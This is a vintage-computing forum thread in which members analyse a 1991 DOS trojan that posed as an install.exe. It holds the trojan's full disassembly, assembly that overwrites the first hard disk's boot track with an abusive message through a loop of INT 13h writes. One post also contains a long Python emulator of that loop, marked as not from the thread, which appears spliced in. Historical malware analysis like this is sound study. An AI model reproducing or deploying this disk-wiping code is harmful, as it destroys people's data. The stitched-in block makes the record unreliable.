
Anybody wanna have a look at an old Trojan?

Stone (10k Member; joined Nov 3, 2009; 12,814 messages; South Jersey, USA)
Here's the story... I've had this thing lying around since... 1991. I probably should have known better but back then I guess I just didn't. It's an install.exe from something and when it's run it simply deletes the first partition it finds on your HD. I know this because when you run it a second time it deletes the second partition (which, due to the results of the first run, is now the first partition). :) It's nasty, quick and to the point. Even though I know what it does (in practice) I don't read machine code so I don't know what the actual instructions are. If anyone is interested in looking at this thing I'm still curious about it as far as its construction. Once again, it's nasty so I renamed it to avoid the possibility of accidentally executing it. (Stranger things have happened.) So, if you feel like taking a look at it, lemme know and I'll then let you know how to get a copy of it. (I'll give you a link.) Please, don't PM me, just indicate here, in this thread.
 

krebizfan (Veteran Member; joined May 23, 2009; 5,466 messages; Connecticut)
I spent enough time around UCLA to be uninterested in anything from USC.

Unfortunately, that is one concept that is far too easy to write, sometimes happening by accident. I would have to check but I think Undocumented DOS came with a utility to find out what functions get called and that would tell you which method the program used to remove partition entries. Always-on anti-virus tends to intercept calls to those functions.
 

Trixter (Veteran Member; joined Aug 31, 2006; 7,262 messages; Chicagoland, Illinois, USA)
I'll bite. Upload it to /incoming at ftp.oldskool.org or just tell me where to pick it up. I can disassemble it and illustrate various points of interest if you like.

If the file is over 5K in size, it is likely compiled in a high-level language and possibly full of a lot of boring junk. Most trojans were created by unskilled people. (Virii, on the other hand, usually required some skill.)
 

Stone (10k Member; joined Nov 3, 2009; 12,814 messages; South Jersey, USA)
It's 2,595 bytes and most of that is nothing but insulting text. :) This was obviously directed at somebody before it got loose in the wild.

This is it:

MZ#   ÿÿ@  € >  û0jr  €

(Lots of text is in this area)

¸ ŽØŽÀ± ´° » µ ¶ ²€ÍþÁ€ù2vê´LÍ!

I'm really surprised the code copied so well. If this doesn't do it I'll send a link to the file itself.
 

Trixter (Veteran Member; joined Aug 31, 2006; 7,262 messages; Chicagoland, Illinois, USA)
(Said with the greatest restraint and stifled laughter): Please, let me have a link where I can grab the file itself.

Machine code is more than just printable characters, and I need all of them to disassemble things properly.
 

Chuck(G) (25k Member; joined Jan 11, 2007; 39,767 messages; Pacific Northwest, USA)
Note to Stone:

If you need a good hex viewer that runs on 32-bit Windows, look at something like "V"--you can copy and paste from the file viewer window.
 

Trixter (Veteran Member; joined Aug 31, 2006; 7,262 messages; Chicagoland, Illinois, USA)
This was very easy to parse. The code follows, but here's the explanation:

There are two messages, one that overwrites the partition table and another embedded in the code. The first message is the lengthy one, the second is the credits where the programmer actually gives his name, oddly. This second message is simply embedded in the code segment, it isn't used for anything.

The main code points to the first message, then writes nine sectors of it to track 0, sector 0, head 0, on the first hard drive. Then it advances the sector and does it again, until 32 loops of this have gone by, then it exits.

The code is sloppy, because it keeps overwriting the previous message every time it advances -- it also means that the first 31 sectors all contain only the first 512 bytes of the message. He also sets AH to something when it's not used for anything except return codes.

Code:
dseg            segment para public 'DATA'
                assume cs:dseg
HDMessage       db 'Ha you ****in asshole!!! Take this!!!!!!!!!!!!!!!!Heheheheheheheh'
                db 'ehehehhe eheh h ehe he he h eh ehuehe hheeh he hehj ehe he hjejh '
                db 'ejhr ghjeg jhwhwhehehehehehehhehehehehhehehehehehehehashahhahahah'
                db 'ahahahahahahahahhahahahshagdjhdfgkjsgjsghjj ****!WOW MAN I GOT YO'
                db 'U GOOD!Never mess with M.H.You suckDie hard drive DIE!WOW MAN I G'
                db 'OT YOU GOOD!Hehehehehehehehehehehh ehehehehehehehhehehehehheheheh'
                db 'ehehehehashahhahahahahahahahahahahahhahahahshagdjhdfgkjsgjsghjj f'
                db 'uck!WOW MAN I GOT YOU GOOD!WOW MAN I GOT YOU GOOD!Ha you ****in a'
                db 'sshole!!! Take this!!!!!!!!!!!!!!!!Hehehehehehehehehehehhe eheh h'
                db ' ehe he he h eh ehuehe hheeh he hehj ehe he hjejh ejhr ghjeg jhwh'
                db 'whehehehehehehhehehehehhehehehehehehehashahhahahahahahahahahahaha'
                db 'hhahahahshagdjhdfgkjsgjsghjj ****!WOW MAN I GOT YOU GOOD!Never me'
                db 'ss with M.H.You suckDie hard drive DIE!WOW MAN I GOT YOU GOOD!Heh'
                db 'ehehehehehehehehehh ehehehehehehehhehehehehhehehehehehehehashahha'
                db 'hahahahahahahahahahahhahahahshagdjhdfgkjsgjsghjj ****!WOW MAN I G'
                db 'OT YOU GOOD!WOW MAN I GOT YOU GOOD!',0
                align 10h
dseg            ends

; ===========================================================================

; Segment type:  Uninitialized
seg001          segment byte stack 'STACK'
                assume cs:seg001
                assume es:nothing, ss:nothing, ds:dseg
message         db 'hahehahahahahahaThe',0,'asshole',0,'who',0,'brought',0,'you',0,'thisis'
                db 0,10h,'KEITH',11h,0,0,0,0,0,0,0,0,10h,'BARBATO',11h
                db 3B5h dup(0)
seg001          ends

; ===========================================================================

; Segment type:  Pure code
seg002          segment byte public 'CODE'
                assume cs:seg002
                assume es:nothing, ss:seg001, ds:nothing

; =============== S U B R O U T I N E =======================================

; Attributes: noreturn

                public start
start           proc near
                mov     ax, seg dseg
                mov     ds, ax
                assume ds:dseg
                mov     es, ax
                assume es:dseg
                mov     cl, 0

loc_809:                                ; CODE XREF: start+1Dj
                mov     ah, 3
                mov     al, 9
                mov     bx, 0
                mov     ch, 0
                mov     dh, 0
                mov     dl, 80h         ; '€'
                int     13h             ; DISK - WRITE SECTORS FROM MEMORY
                                        ; AL = number of sectors to write, CH = track, CL = sector
                                        ; DH = head, DL = drive, ES:BX -> buffer
                                        ; Return: CF set on error, AH = status, AL = number of sectors written
                inc     cl
                cmp     cl, 32h         ; '2'
                jbe     short loc_809
                mov     ah, 4Ch
                int     21h             ; DOS - 2+ - QUIT WITH EXIT CODE (EXIT)
 

Chuck(G) (25k Member; joined Jan 11, 2007; 39,767 messages; Pacific Northwest, USA)
Pretty clumsy--and it isn't a virus per se--it has no way to propagate itself. On most 3.5" IDE drives, it'll wipe out the MBR but little else, as most hard disks since about 1990 have a geometry of 63 sectors/track. Your precious data will remain intact--all you need to do to recover is restore the MBR. (You did keep a backup copy of your hard disk MBR on floppy, didn't you? Back then, it was just too easy to wipe out without a trojan.) Not clever at all.

Back in the early 70s, we (and I'm not saying who else) wrote a virus for CDC 6000 SCOPE. The trick was to call RPV (job reprieve) and RSJ (reschedule job), so that the RPV bailout was to reschedule another copy of the job. So the first job would spawn 2 copies of itself, then those would spawn 2 more of each....until the input queue filled up with them.

The poor operator couldn't simply drop the jobs, because they'd come back like the broomsticks in the sorcerer's apprentice. The introductory message when the job started was a dayfile message of "YOU HAVE A VIRUS". The only way out was to push the deadstart button.

The program was probably smaller than the one just shown.
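As an added example (not code from this thread or from the trojan's author), the Python below models just the instruction subset in Trixter's listing, using the bytes visible in Stone's dump, and simulates INT 13h AH=03h against a drive with a chosen sectors-per-track count, so you can check Chuck's point about 63 sectors/track and see which of the loop's writes a BIOS would even accept. The BIOS rules (sector 0 rejected, sectors past the end of the track rejected, a multi-sector write that would cross the track end rejected) and the first partition starting at LBA == sectors/track are assumptions.

```python
# Bytes of the code segment, reconstructed from the listing/dump in this thread.
CODE = bytes.fromhex(
    "B80000 8ED8 8EC0 B100"                 # mov ax,seg dseg; mov ds,ax; mov es,ax; mov cl,0
    "B403 B009 BB0000 B500 B600 B280 CD13"  # ah=3 al=9 bx=0 ch=0 dh=0 dl=80h; int 13h
    "FEC1 80F932 76EA"                      # inc cl; cmp cl,32h; jbe back to the ah=3 setup
    "B44C CD21")                            # mov ah,4Ch; int 21h
R8 = ["al", "cl", "dl", "bl", "ah", "ch", "dh", "bh"]  # 8-bit register order the opcodes use

def run(spt, heads=4):
    """Execute CODE on a drive with `spt` sectors/track; return (LBAs written, BIOS errors, INT 13h calls).
    AX and AH/AL are tracked separately, which is fine here: this program never mixes them."""
    r = dict.fromkeys(R8 + ["ax", "bx", "ds", "es"], 0)
    ip, cf, zf, written, errors, calls = 0, False, False, set(), 0, 0
    while True:
        op = CODE[ip]
        if op == 0xB8: r["ax"] = int.from_bytes(CODE[ip+1:ip+3], "little"); ip += 3
        elif op == 0xBB: r["bx"] = int.from_bytes(CODE[ip+1:ip+3], "little"); ip += 3
        elif op == 0x8E: r["ds" if CODE[ip+1] == 0xD8 else "es"] = r["ax"]; ip += 2
        elif 0xB0 <= op <= 0xB7: r[R8[op - 0xB0]] = CODE[ip+1]; ip += 2   # mov r8, imm8
        elif op == 0xFE: reg = R8[CODE[ip+1] & 7]; r[reg] = (r[reg] + 1) & 0xFF; ip += 2  # inc r8
        elif op == 0x80:                                   # cmp r8, imm8 (only CF/ZF are needed)
            a, b = r[R8[CODE[ip+1] & 7]], CODE[ip+2]; cf, zf = a < b, a == b; ip += 3
        elif op == 0x76:                                   # jbe rel8
            rel = CODE[ip+1] - 256 if CODE[ip+1] > 127 else CODE[ip+1]
            ip += 2 + rel if (cf or zf) else 2
        elif op == 0xCD and CODE[ip+1] == 0x13 and r["ah"] == 3:   # simulated BIOS write sectors
            calls += 1
            cyl = r["ch"] | ((r["cl"] & 0xC0) << 2); sec = r["cl"] & 0x3F; n = r["al"]
            if sec == 0 or sec + n - 1 > spt:             # assumed: invalid start or past track end
                cf, errors = True, errors + 1
            else:
                cf = False; first = (cyl * heads + r["dh"]) * spt + sec - 1
                written.update(range(first, first + n))
            ip += 2
        elif op == 0xCD and CODE[ip+1] == 0x21 and r["ah"] == 0x4C:  # DOS terminate
            return sorted(written), errors, calls
        else:
            raise ValueError(f"opcode {op:02X} at offset {ip} is not modelled")

def report(spt):
    """Summarise the damage for one geometry. Assumes the DOS-era layout in which the
    first partition starts at cylinder 0, head 1, sector 1, i.e. LBA == spt."""
    lbas, errors, calls = run(spt)
    return {"int13_calls": calls, "bios_errors": errors, "mbr_hit": 0 in lbas,
            "last_lba_hit": max(lbas), "first_partition_hit": any(l >= spt for l in lbas)}

if __name__ == "__main__":
    for spt in (17, 63):          # an MFM-era geometry vs. the 63 sectors/track Chuck cites
        print(spt, report(spt))
```

With 63 sectors/track every accepted write lands inside track 0, so only the MBR track is destroyed and the partition data itself survives; the loop also shows that the counter runs from 0 through 32h, so the first INT 13h call (sector 0) is one a BIOS would refuse.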
 

Stone (10k Member; joined Nov 3, 2009; 12,814 messages; South Jersey, USA)
It was issued circa 1991 when lots of us still had MFM drives in our machines. It came as an IBM PC program -- someone replaced the original install.exe with this little goodie.
 

Chuck(G) (25k Member; joined Jan 11, 2007; 39,767 messages; Pacific Northwest, USA)
One can only hope said prank was for a non-critical system. IPL'ing any mainframe in the middle of a day really throws all the operators off. (snicker)

Oh, tormenting operators was what made life interesting in an otherwise boring day. I think the official solution to the RSJ thing was to rename RSJ as a 1xx PPU program, thereby making it directly inaccessible to user programs, but leaving it useful for the OS.

When SCOPE 3.4 came out (the immediate predecessor to NOS BE), it was decided and approved by design committee that a useful disk I/O command would be "Read list string", in which the stack processor could be presented with a list of RBRs to read as long as the read buffer could be emptied (SCOPE I/O used circular buffering). What harm could you do with a read command, after all?--it would speed up the process of the loader linking up from libraries immensely. Some wise guy constructed a small program that not only emptied the buffer (just set IN=OUT), but kept adding to the list of RBTs, essentially hanging the stack processor (PP assigned to do disk access). Again, deadstart time because the system couldn't even load the overlay to terminate a job.

I remember back in the 60s, some joker wrote a program that ran under DOS/360 that used a CCW with a TIC to cause the 1052 console typewriter to ring its bell nonstop--it locked the keyboard as well and tied up the multiplexer channel. That was great, because not only did it cause operator panic, but it was noisy. Add to this that one of the first operators confronted with this one panicked and responded by pulling the "Emergency Stop" switch. (Required CE service to get things going again.)

Ah, the good old days... :)
 